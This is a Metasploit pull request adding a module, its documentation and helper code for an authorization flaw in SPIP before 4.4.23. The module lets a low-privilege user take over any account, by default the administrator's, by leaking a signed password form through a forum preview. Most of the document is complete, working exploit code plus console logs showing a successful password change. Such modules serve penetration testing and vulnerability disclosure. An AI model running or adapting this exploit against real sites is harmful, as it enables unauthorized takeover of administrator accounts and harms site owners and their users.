### PR TITLE
Add SPIP password change IDOR privilege escalation module

### DIFF
--- a/documentation/modules/auxiliary/admin/http/spip_idor_password_reset.md
+++ b/documentation/modules/auxiliary/admin/http/spip_idor_password_reset.md
@@ -1,0 +1,93 @@
+## Vulnerable Application
+
+SPIP before 4.4.23 has a missing authorization check in the `mot_de_passe`
+CVT form handler. The `traiter` function changes any user's password when
+given a validly-signed form POST, without verifying the caller is authorized
+for that `id_auteur`. An authenticated user can obtain a valid signature by
+injecting the SPIP model tag `<formulaire|mot_de_passe|id_auteur=N>` into
+a forum message preview, which causes the server to render and HMAC-sign the
+password form for user N. The preview replaces `<form>` tags with `<div>` but
+leaves hidden inputs intact, leaking the signed arguments.
+
+Affected versions: SPIP < 4.4.23 (with forum plugin < 3.1.17).
+Fixed in: SPIP 4.4.23 / forum plugin 3.1.17.
+
+### Install
+
+Download SPIP 4.4.20 from https://files.spip.net/spip/archives/ and extract it:
+
+```
+wget https://files.spip.net/spip/archives/SPIP-v4.4.20.zip
+unzip SPIP-v4.4.20.zip -d spip
+cd spip
+php -S 127.0.0.1:8082
+```
+
+Complete the web-based setup at `http://127.0.0.1:8082/ecrire/` to create
+the admin account. Then create a second low-privilege user (status `1comite`
+or `6forum`) via the admin panel under Authors.
+
+## Verification Steps
+
+1. Install SPIP <= 4.4.22
+2. Create an admin account and a low-privilege account
+3. Start msfconsole
+4. Do: `use auxiliary/admin/http/spip_idor_password_reset`
+5. Do: `set RHOSTS [ip]`
+6. Do: `set RPORT [port]`
+7. Do: `set USERNAME [low-priv username]`
+8. Do: `set PASSWORD [low-priv password]`
+9. Do: `set TARGET_ID 1`
+10. Do: `run`
+11. The admin's password should be changed to the printed value.
+
+## Options
+
+### USERNAME
+
+Username of any authenticated SPIP account. Even the lowest privilege level
+(`6forum`) is sufficient.
+
+### PASSWORD
+
+Password for the SPIP account specified in USERNAME.
+
+### TARGET_ID
+
+The `id_auteur` of the user whose password to change. Defaults to `1`, which
+is typically the webmaster/admin account.
+
+### NEW_PASSWORD
+
+The new password to set on the target account. If left blank, a random
+16-character alphanumeric password is generated.
+
+## Scenarios
+
+### SPIP 4.4.20 on PHP 8.x
+
+```
+msf6 > use auxiliary/admin/http/spip_idor_password_reset
+msf auxiliary(admin/http/spip_idor_password_reset) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf auxiliary(admin/http/spip_idor_password_reset) > set RPORT 8082
+RPORT => 8082
+msf auxiliary(admin/http/spip_idor_password_reset) > set USERNAME lowpriv
+USERNAME => lowpriv
+msf auxiliary(admin/http/spip_idor_password_reset) > set PASSWORD password
+PASSWORD => password
+msf auxiliary(admin/http/spip_idor_password_reset) > set TARGET_ID 1
+TARGET_ID => 1
+msf auxiliary(admin/http/spip_idor_password_reset) > run
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP version: 4.4.20
+[+] The target appears to be vulnerable. SPIP 4.4.20 lacks authorization on password change form
+[+] Authenticated as 'lowpriv'
+[*] Injecting model to render password form for author #1...
+[+] Extracted signed password form arguments from preview
+[*] Submitting password change for author #1...
+[+] Password for author #1 changed to: AGMOdviMKkVUWUpO
+[*] Auxiliary module execution completed
+msf auxiliary(admin/http/spip_idor_password_reset) >
+```

--- a/lib/msf/core/exploit/remote/http/spip.rb
+++ b/lib/msf/core/exploit/remote/http/spip.rb
@@ -12,6 +12,64 @@ module Msf
       ])
     end
 
+    # Extract the HMAC-signed CVT hidden fields for a given form action.
+    #
+    # @param html [Nokogiri::HTML::Document] Parsed HTML document
+    # @param action_name [String] Value of the formulaire_action hidden input
+    # @return [Hash, nil] Hash with 'args' and 'sign' keys, or nil if not found
+    def spip_extract_cvt_fields(html, action_name)
+      container = html.css("input[name='formulaire_action']").find { |n| n['value'] == action_name }&.parent
+      return unless container
+
+      args = container.at_css("input[name='formulaire_action_args']")
+      return unless args
+
+      sign = container.at_css("input[name='formulaire_action_sign']")
+      return unless sign
+
+      { 'args' => args['value'].to_s, 'sign' => sign['value'].to_s }
+    end
+
+    # Authenticate against the SPIP login form.
+    # Sets @spip_cookie on success. Requires USERNAME and PASSWORD datastore options.
+    #
+    # @param username [String] SPIP username
+    # @param password [String] SPIP password
+    # @return [String] Session cookie string
+    # @raise [Rex::RuntimeError] on authentication failure
+    def spip_login(username, password)
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'spip.php'),
+        'vars_get' => { 'page' => 'login' }
+      )
+      raise Rex::RuntimeError, 'Login page did not respond' unless res
+
+      cvt = spip_extract_cvt_fields(res.get_html_document, 'login')
+      raise Rex::RuntimeError, 'Login form not found' unless cvt
+
+      cookie = res.get_cookies
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'spip.php'),
+        'cookie' => cookie,
+        'vars_post' => {
+          'page' => 'login',
+          'formulaire_action' => 'login',
+          'formulaire_action_args' => cvt['args'],
+          'formulaire_action_sign' => cvt['sign'],
+          'var_login' => username,
+          'password' => password
+        }
+      )
+      raise Rex::RuntimeError, 'No response to login' unless res
+
+      @spip_cookie = res.get_cookies
+      raise Rex::RuntimeError, 'Authentication failed: no spip_session cookie' unless @spip_cookie&.include?('spip_session')
+
+      @spip_cookie
+    end
+
     # Determine Spip version
     #
     # @return [Rex::Version] Version as Rex::Version

--- a/modules/auxiliary/admin/http/spip_idor_password_reset.rb
+++ b/modules/auxiliary/admin/http/spip_idor_password_reset.rb
@@ -1,0 +1,208 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Spip
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SPIP Password Change IDOR Privilege Escalation',
+        'Description' => %q{
+          SPIP before 4.4.23 has a missing authorization check in the
+          mot_de_passe CVT form handler. The traiter function changes
+          any user's password when given a validly-signed form POST,
+          without verifying the caller is authorized for that id_auteur.
+
+          An authenticated user injects a SPIP model tag into a forum
+          message preview. The model <formulaire|mot_de_passe|id_auteur=N>
+          causes the server to render the password form for user N and
+          HMAC-sign the form arguments. The preview replaces <form> tags
+          with <div> but leaves hidden inputs intact, leaking the signed
+          arguments. Submitting them changes the target user's password.
+        },
+        'Author' => [
+          'Julien Voisin' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-4-23.html']
+        ],
+        'DisclosureDate' => '2026-09-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'SPIP username (any authenticated account)']),
+      OptString.new('PASSWORD', [true, 'Password for the SPIP account']),
+      OptInt.new('TARGET_ID', [true, 'Author ID whose password to change (1 = webmaster)', 1]),
+      OptString.new('NEW_PASSWORD', [false, 'New password (random if blank)'])
+    ])
+  end
+
+  def check
+    rversion = spip_version || spip_plugin_version('spip')
+    return Exploit::CheckCode::Unknown('Unable to determine SPIP version') unless rversion
+
+    print_status("SPIP version: #{rversion}")
+    return Exploit::CheckCode::Safe("SPIP #{rversion} is patched") if rversion >= Rex::Version.new('4.4.23')
+
+    Exploit::CheckCode::Appears("SPIP #{rversion} lacks authorization on password change form")
+  end
+
+  # Inject <formulaire|mot_de_passe|id_auteur=N> into each discovered forum preview
+  # and return the leaked CVT fields for the password form.
+  def inject_model_via_forum(target_id)
+    model_tag = "<formulaire|mot_de_passe|id_auteur=#{target_id}>"
+
+    forum_targets.each do |target|
+      result = try_forum_preview(model_tag, target)
+      return result if result
+    end
+    nil
+  end
+
+  def try_forum_preview(model_tag, target)
+    vprint_status("Trying #{target[:label]}...")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => target[:uri],
+      'cookie' => @spip_cookie,
+      'vars_get' => target[:params]
+    )
+    return unless res&.code == 200
+
+    cvt = spip_extract_cvt_fields(res.get_html_document, target[:form_action])
+    return unless cvt
+
+    vprint_good("Forum form found: #{target[:label]}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => target[:uri],
+      'cookie' => @spip_cookie,
+      'vars_get' => target[:params],
+      'vars_post' => target.fetch(:post_extra, {}).merge(
+        'formulaire_action' => target[:form_action],
+        'formulaire_action_args' => cvt['args'],
+        'formulaire_action_sign' => cvt['sign'],
+        'texte' => model_tag,
+        'titre' => Rex::Text.rand_text_alpha(8)
+      )
+    )
+    return unless res
+
+    cvt = spip_extract_cvt_fields(res.get_html_document, 'mot_de_passe')
+    return unless cvt
+
+    print_good("Extracted signed password form from #{target[:label]}")
+    cvt
+  end
+
+  def forum_targets
+    ecrire_uri = normalize_uri(target_uri.path, 'ecrire/')
+    public_uri = normalize_uri(target_uri.path, 'spip.php')
+    targets = []
+
+    # Private forums: rubrique #1 always exists, then scrape the dashboard for more
+    discover_object_ids.each do |objet, id|
+      targets << {
+        label: "private #{objet} ##{id}",
+        uri: ecrire_uri,
+        form_action: 'forum_prive',
+        params: { 'exec' => 'forum', 'repondre' => 'new', 'objet' => objet, 'id_objet' => id }
+      }
+    end
+
+    # Public forums on discovered articles
+    discover_article_ids.each do |id|
+      targets << {
+        label: "public article ##{id}",
+        uri: public_uri,
+        form_action: 'forum',
+        params: { 'page' => 'forum', 'id_article' => id },
+        post_extra: { 'page' => 'forum', 'id_article' => id }
+      }
+    end
+
+    targets
+  end
+
+  def discover_object_ids
+    pairs = [['rubrique', 1]]
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ecrire/'),
+      'cookie' => @spip_cookie,
+      'vars_get' => { 'exec' => 'accueil' }
+    )
+    if res&.code == 200
+      res.body.scan(/id_article=(\d+)/) { |m| pairs << ['article', m[0].to_i] }
+      res.body.scan(/id_rubrique=(\d+)/) { |m| pairs << ['rubrique', m[0].to_i] }
+    end
+    pairs.uniq
+  end
+
+  def discover_article_ids
+    ids = []
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, ''),
+      'cookie' => @spip_cookie
+    )
+    if res&.code == 200
+      res.body.scan(/spip\.php\?article(\d+)/) { |m| ids << m[0].to_i }
+      res.body.scan(/id_article=(\d+)/) { |m| ids << m[0].to_i }
+    end
+    ids.uniq.sort
+  end
+
+  def run
+    begin
+      spip_login(datastore['USERNAME'], datastore['PASSWORD'])
+    rescue Rex::RuntimeError => e
+      fail_with(Failure::NoAccess, e.message)
+    end
+    print_good("Authenticated as '#{datastore['USERNAME']}'")
+
+    target_id = datastore['TARGET_ID']
+    print_status("Injecting model to render password form for author ##{target_id}...")
+
+    cvt = inject_model_via_forum(target_id)
+    fail_with(Failure::NotVulnerable, "Could not render password form for author ##{target_id}") unless cvt
+
+    pass = datastore['NEW_PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['NEW_PASSWORD']
+    print_status("Submitting password change for author ##{target_id}...")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'cookie' => @spip_cookie,
+      'vars_post' => {
+        'formulaire_action' => 'mot_de_passe',
+        'formulaire_action_args' => cvt['args'],
+        'formulaire_action_sign' => cvt['sign'],
+        'oubli' => pass,
+        'oubli_confirm' => pass,
+        'nobot' => ''
+      }
+    )
+    fail_with(Failure::Unreachable, 'Target did not respond') unless res
+    if res.get_html_document.at_css('.reponse_formulaire_erreur')
+      fail_with(Failure::UnexpectedReply, 'Password change was rejected by the server')
+    end
+
+    print_good("Password for author ##{target_id} changed to: #{pass}")
+    report_vuln(host: rhost, port: rport, name: name, refs: references)
+    store_valid_credential(user: "author_#{target_id}", private: pass)
+  end
+end


### PR DESCRIPTION
## Description

The mot_de_passe CVT form handler in SPIP before 4.4.23 changes any user's password given a validly-signed POST without checking that the caller is authorized for that id_auteur. An authenticated user injects <formulaire|mot_de_passe|id_auteur=N> into a forum message preview, which renders and HMAC-signs the password form for user N. The preview replaces <form> with <div> but leaves hidden inputs intact, leaking the signed arguments needed to submit the password change.

## Breaking Changes

<!-- Does this PR change existing behavior, remove options, rename datastore settings, or alter API/mixin interfaces? If yes, describe what breaks and how users should adapt. Write "None" if not applicable. -->

None

## Reviewer Notes

<!-- (Optional) Guide the reviewer: where to start reading, what the key change is, what's intentionally left out or deferred. Delete this section if not needed. -->

## Verification Steps

<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

1. - [ ] Install SPIP <= 4.4.22 (`wget https://files.spip.net/spip/archives/SPIP-v4.4.20.zip`)                                     
2. - [ ] Create an admin account and a low-privilege account            
3. - [ ] Start msfconsole                                               
4. - [ ] Do: `use auxiliary/admin/http/spip_idor_password_reset`        
5. - [ ] Do: `set RHOSTS [ip]`                                          
6. - [ ] Do: `set RPORT [port]`                                         
7. - [ ] Do: `set USERNAME [low-priv username]`                         
8. - [ ] Do: `set PASSWORD [low-priv password]`                         
9. - [ ] Do: `run`                                                     
10. - [ ] The admin's password should be changed to the printed value.  


## Test Evidence

```console
msf > use auxiliary/admin/http/spip_idor_password_reset
msf auxiliary(admin/http/spip_idor_password_reset) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(admin/http/spip_idor_password_reset) > set RPORT 8082
RPORT => 8082
msf auxiliary(admin/http/spip_idor_password_reset) > setg USERNAME lowpriv
USERNAME => lowpriv
msf auxiliary(admin/http/spip_idor_password_reset) > setg PASSWORD pouetpouet
PASSWORD => pouetpouet
msf auxiliary(admin/http/spip_idor_password_reset) > check
[*] SPIP version: 4.4.20
[+] 127.0.0.1:8082 - The target appears to be vulnerable. SPIP 4.4.20 lacks authorization on password change form
msf auxiliary(admin/http/spip_idor_password_reset) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP version: 4.4.20
[+] The target appears to be vulnerable. SPIP 4.4.20 lacks authorization on password change form
[+] Authenticated as 'lowpriv'
[*] Injecting model to render password form for author #1...
[+] Extracted signed password form from private rubrique #1
[*] Submitting password change for author #1...
[+] Password for author #1 changed to: jxeMazSFJkhj1rTX
[*] Auxiliary module execution completed
msf auxiliary(admin/http/spip_idor_password_reset) > 
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Fedora 44 |
| **Target Software/Hardware** | Spip 4.4.22 |


## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->

"None"

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
